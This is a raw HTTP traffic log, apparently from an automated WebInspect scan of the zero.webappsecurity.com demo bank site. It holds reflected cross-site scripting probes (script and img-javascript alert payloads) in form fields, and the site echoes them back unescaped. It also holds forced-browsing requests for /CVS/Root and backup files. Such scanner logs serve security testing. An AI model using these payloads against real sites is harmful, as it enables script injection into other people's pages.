<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE="--><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=>"><script>alert('XSS')</script>&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:28 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4006
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=">"><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /join.asp?name=&email=&surname=>"><script>alert("XSS")</script>&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:32 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4006
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=">"><script>alert("XSS")</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /CVS/Root HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:34:23 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Last-Modified: Mon, 07 Jan 2002 20:34:30 GMT
ETag: "727e99b5ba97c11:8f6"
Content-Length: 35
:pserver:jeff@localhost:/home/src
GET /login/login.asp?Action=Login&UserName=>"'><img%20src="javascript:alert('XSS')">&Password=333%2D333%2D3333test@test999.com HTTP/1.0
Referer: http://zero.webappsecurity.com:80/login/login.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:53:59 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 362
Content-Type: text/html
Cache-control: private
<HTML>
<HEAD>
<BODY>
<h1>Invalid username: >"'><img src="javascript:alert('XSS')"></h1>
<form action=login.asp method=get>
Please login:<br>
Username: <input type=text name=UserName><br>
Password: <input type=password name=Password><br>
<input type=submit value="Login"><br>
<input type=hidden name=Action value="Login"><br>
</form>
</BODY></HTML>
GET /p3.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pcomboindex.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:22 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 168
Content-Type: text/html
Cache-control: private
<html>
<body>
This is shown clicking the combo box labeled "Show Page Three"<br>
<br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
GET /banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod%5Fsel.forte&source=Freebank&AD_REFERRING_URL=http%3A%2F%2Fwww.Freebank.com HTTP/1.0
Referer: http://zero.webappsecurity.com:80/
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:16 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4915
Content-Type: text/html
Cache-control: private
Set-Cookie: sessionid=; path=/
Set-Cookie: state=; path=/
Set-Cookie: username=; path=/
Set-Cookie: userid=; path=/
<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<BODY>
<TABLE BGCOLOR="#ffffff" STYLE="border: 3px solid black">
<TR>
<TD
STYLE="border-left: 12px solid #2E7AA3; border-top: 7px solid #2E7AA3"
HEIGHT="47" ROWSPAN="2" VALIGN="TOP"><IMG
SRC="/images/freebank-logo2.gif" ALIGN="LEFT" BORDER="0" WIDTH="150"
HEIGHT="50"><BR><BR></TD>
<TD STYLE="border-top: 7px solid #2E7AA3" WIDTH="571" HEIGHT="47"
VALIGN="TOP"> </TD>
<TD STYLE="border-top: 7px solid #2E7AA3" WIDTH="571"
VALIGN="TOP"> </TD>
</TR>
<TR>
<TD WIDTH="571" VALIGN="TOP" ROWSPAN="7" HEIGHT="49">
<TABLE>
<TR>
<TD BGCOLOR="#2E7AA3" STYLE="border: 1px solid black" WIDTH="258"
HEIGHT="217">
<FORM ACTION="login1.asp" METHOD="post">
<CENTER><br>Username:<BR><INPUT TYPE="text" NAME="login"
STYLE="border: 1px solid black; spacing: 0"><BR>Password:<BR><INPUT TYPE="password"
NAME="password" STYLE="border: 1px solid black; spacing: 0"><BR><INPUT
TYPE="radio" NAME="graphicOption" VALUE="minimum" CHECKED="CHECKED"><FONT
SIZE="-1">Minimum Graphics</FONT><BR><INPUT TYPE="radio" NAME="graphicOption"
VALUE="standard"><FONT SIZE="-1">Standard Graphics</FONT><BR><BR><INPUT
TYPE="submit" STYLE="border: 1px solid black"
VALUE=" Access Accounts "><BR></CENTER></FORM></TD>
<TD STYLE="border: 1px solid black" WIDTH="304" HEIGHT="217"
ROWSPAN="2"><IMG SRC="/images/lock.gif" WIDTH="304" HEIGHT="266"
BORDER="0"></TD>
</TR>
<TR>
<TD BGCOLOR="ffffff" STYLE="border: 1px solid black" WIDTH="258" HEIGHT="241"
VALIGN="TOP"><FONT SIZE="-2">We are confident of our system's ability to
protect all transactions; however, this is not an invitation for people to
attempt unauthorized access to the system. This is a private computing system
which is restricted to authorized individuals. Actual or attempted unauthorized
use of this computer system may result in criminal and/or civil prosecution. We
reserve the right to view, monitor, and record activity on the system without
notice or permission. Any information obtained by monitoring, reviewing, or
recording is subject to review by law enforcement organizations in connection
with the investigation or prosecution of possible criminal activity on the
system. If you are not an authorized user of this system or do not consent to
continued monitoring, exit the system at this time. </FONT></TD>
</TR>
</TABLE></TD>
<TD WIDTH="175" VALIGN="TOP" ROWSPAN="7"><table width="175" border="0" cellspacing="3" cellpadding="5">
<tr>
<td STYLE="border: 1px solid black"><p><img src="images/SPI_logo.jpg" width="150" height="36"></p>
<p><font size="2" face="Arial, Helvetica, sans-serif">If you would
like a free trial version of WebInspect to test this website
site.</font></p>
<p><font size="2" face="Arial, Helvetica, sans-serif"><a href="http://www.spidynamics.com/download.html" target="_blank"><strong>Download Click Here</strong></a></font></p></td>
</tr>
</table></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><IMG
SRC="/images/customer-login.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><A
HREF="/pindex.asp"><IMG SRC="/images/financial-planning.gif" ALIGN="LEFT"
BORDER="0" WIDTH="150" HEIGHT="20"></A></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"
HEIGHT="19"><IMG SRC="/images/services.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"
HEIGHT="24"><IMG SRC="/images/your-accounts.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><IMG
SRC="/images/customer-support.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border-left: 12px solid #2E7AA3" WIDTH="162"
ALIGN="CENTER">
<FORM ACTION="rootlogin.asp" METHOD="post">
<P><FONT SIZE="-1" FACE="Arial"> Register for an Interest Checking
Account with FreeBank:</FONT></P>
<P><FONT SIZE="-1" FACE="Arial">First Name:</FONT><INPUT
TYPE="text" NAME="txtPassPhrase"
STYLE="border: 1px solid black; spacing: 0"><BR><FONT SIZE="-1"
FACE="Arial">Last Name:</FONT><INPUT TYPE="text" NAME="txtName"
STYLE="border: 1px solid black; spacing: 0"><BR>
<INPUT TYPE="hidden" NAME="txtHidden" VALUE="This was hidden from the user">
<INPUT TYPE="submit" STYLE="border: 1px solid black"
VALUE="Register"></P></FORM></TD>
</TR>
</TABLE>
</BODY>
</HTML>
GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=>"'><img%20src="javascript:alert('XSS')">&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:39 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4013
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=">"'><img src="javascript:alert('XSS')">"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
POST /rootlogin.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com
Content-Length: 127
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&txtPassPhrase=333%2D333%2D3333test@test999.com&txtName=>"><script>alert('XSS')</script>HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:37:56 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 108
Content-Type: text/html
Cache-control: private
<html>
<body>
Invalid Data >"><script>alert('XSS')</script><br>Please try again.
</body>
</html>
GET /linking/link1/link2/link3/link4/link5/link6/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:31 GMT
Content-Type: text/html
Content-Length: 172
<html><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>GET /aspnet.aspx.bak HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:35:22 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:38:18 GMT
ETag: "8c77e0c0a8dc11:8f6"
Content-Length: 0
POST /login1.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com
Content-Length: 102
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
login=>"><script>alert("XSS")</script>&password=333%2D333%2D3333test@test999.com&graphicOption=minimumHTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:37:41 GMT
X-Powered-By: ASP.NET
Location: banklogin.asp?err=Invalid Login: >"><script>alert("XSS")</script>
Connection: Keep-Alive
Content-Length: 121
Content-Type: text/html
Cache-control: private
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="">here</a>.</body>
GET /W3SVC1/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:26:09 GMT
Content-Type: text/html
Content-Length: 172
<html><head><title>Directory Listing Denied</title></head>
